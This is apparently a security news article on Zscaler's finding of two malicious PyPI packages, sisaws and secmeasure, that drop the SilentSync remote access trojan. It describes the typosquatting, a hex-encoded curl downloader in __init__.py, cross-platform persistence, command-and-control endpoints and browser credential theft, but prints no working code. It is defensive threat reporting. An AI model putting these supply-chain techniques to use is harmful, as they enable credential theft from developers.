Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PyPI) repository that are designed to deliver a remote access trojan called SilentSync on Windows systems.
“SilentSync is capable of remote command execution, file exfiltration, and screen capturing,” Zscaler ThreatLabz’s Manisha Ramcharan Prajapati and Satyam Singh said. “SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”
The packages, now no longer available for download from PyPI, are listed below. They were both uploaded by a user named “CondeTGAPIS.”
- sisaws (201 Downloads)
- secmeasure (627 Downloads)
Zscaler said the package sisaws mimics the behavior of the legitimate Python package sisa, which is associated with Argentina’s national health information system, Sistema Integrado de Información Sanitaria Argentino (SISA).
However, present in the library is a function called “gen_token()” in the initialization script (__init__.py) that acts as a downloader for a next-stage malware. To achieve this, it sends a hard-coded token as input, and receives as response a secondary static token in a manner that’s similar to the legitimate SISA API.
“If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script,” Zscaler said. “The Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed.”
Secmeasure, in a similar fashion, masquerades as a “library for cleaning strings and applying security measures,” but harbors embedded functionality to drop SilentSync RAT.
SilentSync is mainly geared towards infecting Windows systems at this stage, but the malware is also equipped with built-in features for Linux and macOS as well, making Registry modifications on Windows, altering the crontab file on Linux to execute the payload on system startup, and registering a LaunchAgent on macOS.
The package relies on the secondary token’s presence to send an HTTP GET request to a hard-coded endpoint (“200.58.107[.]25”) in order to receive Python code that’s directly executed in memory. The server supports four different endpoints –
- /checkin, to verify connectivity
- /comando, to request commands to execute
- /respuesta, to send a status message
- /archivo, to send command output or stolen data
The malware is capable of harvesting browser data, executing shell commands, capturing screenshots, and stealing files. It can also exfiltrate files and entire directories in the form of ZIP archives. Once the data is transmitted, all the artifacts are deleted from the host to sidestep detection efforts.
“The discovery of the malicious PyPI packages sisaws and secmeasure highlight the growing risk of supply chain attacks within public software repositories,” Zscaler said. “By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII).”
